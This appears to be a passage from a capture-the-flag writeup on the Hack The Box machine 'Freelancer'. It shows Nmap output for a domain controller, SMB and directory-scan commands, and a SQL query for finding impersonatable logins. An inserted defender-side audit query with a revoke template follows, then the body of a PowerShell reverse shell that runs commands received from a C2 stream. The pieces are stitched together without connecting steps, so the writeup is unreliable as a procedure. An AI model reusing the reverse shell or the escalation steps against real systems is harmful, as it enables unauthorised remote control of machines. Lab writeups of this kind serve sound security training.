```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 19:20 CST
Warning: 10.10.11.5 giving up on port because retransmission cap hit (10).
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.11.5, 16) => Operation not permitted
Offending packet: TCP 10.10.16.4:35511 > 10.10.11.5:8189 S ttl=44 id=31021 iplen=44  seq=2972970908 win=1024 <mss 1460>
Nmap scan report for 10.10.11.5
Host is up (0.83s latency).
Not shown: 59837 closed tcp ports (reset), 5672 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-30 16:21:28Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
55297/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.5\SQLEXPRESS: 
|     Instance name: SQLEXPRESS
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 55297
|     Named pipe: \\10.10.11.5\pipe\MSSQL$SQLEXPRESS\sql\query
|_    Clustered: false
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-10-30T16:19:02
|_Not valid after:  2054-10-30T16:19:02
| ms-sql-ntlm-info: 
|   10.10.11.5\SQLEXPRESS: 
|     Target_Name: FREELANCER
|     NetBIOS_Domain_Name: FREELANCER
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: freelancer.htb
|     DNS_Computer_Name: DC.freelancer.htb
|     DNS_Tree_Name: freelancer.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-10-30T16:23:30+00:00; +5h00m04s from scanner time.
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|Vista|10|2012|Longhorn|7|8.1|2016|11 (94%)
OS CPE: cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_8
Aggressive OS guesses: Microsoft Windows Server 2019 (94%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 10 1709 - 1909 (91%), Microsoft Windows Server 2012 (91%), Microsoft Windows 10 2004 (90%), Microsoft Windows Longhorn (90%), Microsoft Windows Server 2012 R2 Update 1 (90%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows Server 2012 or Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   689.59 ms 10.10.16.1
2   366.60 ms 10.10.11.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.91 seconds
```
Quite a few ports are open, and the combination (DNS, Kerberos, LDAP, SMB, the NetBIOS/DNS names in the ms-sql-ntlm-info output) shows that this host is a domain controller. The port 80 result reveals the domain name freelancer.htb, which we add to /etc/hosts. A SQL Server instance (SQLEXPRESS, TCP 55297) is also exposed.
SMB
```
smbclient -L //10.10.11.5
```
SMB yields nothing of interest.
Port 80
Run a directory scan:
```
gobuster dir -u http://freelancer.htb/ -w /usr/share/wordlists/dirb/common.txt -t 5
```
```sql
-- Logins that appear as grantor of an IMPERSONATE permission, i.e. logins
-- that some other principal on this instance has been allowed to impersonate.
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
```
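The query above answers the attacker's question (which logins can be impersonated). The defender wants the full picture: who holds each IMPERSONATE grant, which login it points at, and whether that login is a sysadmin, because an IMPERSONATE grant onto a sysadmin login is a direct privilege-escalation path from a low-privileged SQL login. The audit query below is an added example, not part of the original writeup; it resolves the impersonated login through `major_id` (the securable's principal id) rather than through the grantor, and uses no instance-specific names. The `REVOKE` line is a remediation template with placeholder principal names.

```sql
-- Added defender-side audit of server-level IMPERSONATE grants (not from the
-- original writeup). Runs against any SQL Server 2012+ instance; the
-- principal names it returns are whatever exists on the audited server.
SELECT
    grantee.name                              AS grantee_login,
    grantee.type_desc                         AS grantee_type,
    target.name                               AS impersonatable_login,
    perm.state_desc                           AS grant_state,          -- GRANT / DENY / GRANT_WITH_GRANT_OPTION
    IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin    -- 1 = escalation path to sysadmin
FROM sys.server_permissions AS perm
JOIN sys.server_principals  AS grantee ON perm.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals  AS target  ON perm.major_id            = target.principal_id
WHERE perm.class_desc      = 'SERVER_PRINCIPAL'   -- permission is on a login, not on the server object
  AND perm.permission_name = 'IMPERSONATE'
ORDER BY target_is_sysadmin DESC, grantee_login;

-- Remediation template for an unjustified grant (placeholder names, fill in
-- from the result set above):
-- REVOKE IMPERSONATE ON LOGIN::[impersonatable_login] FROM [grantee_login];
```

Rows with `target_is_sysadmin = 1` and a `grant_state` of `GRANT` are the ones to review first; the same two-principal layout works for database-level `IMPERSONATE` by substituting `sys.database_permissions` and `sys.database_principals`.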
```powershell
# Writes a string to C2
function WriteToStream($String) {
    # Create buffer to be used for next network stream read. Size is determined by the TCP client receive buffer (65536 by default)
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % { 0 }

    # Write to C2
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}

# Initial output to C2. The function also creates the initial empty byte array buffer used below.
WriteToStream ''

# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.
while (($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    # Encode command, remove last byte/newline
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)

    # Execute command and save output (including errors thrown)
    $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String }

    # Write output to C2
    WriteToStream ($Output)
}

# Closes the StreamWriter and the underlying TCPClient
$StreamWriter.Close()
```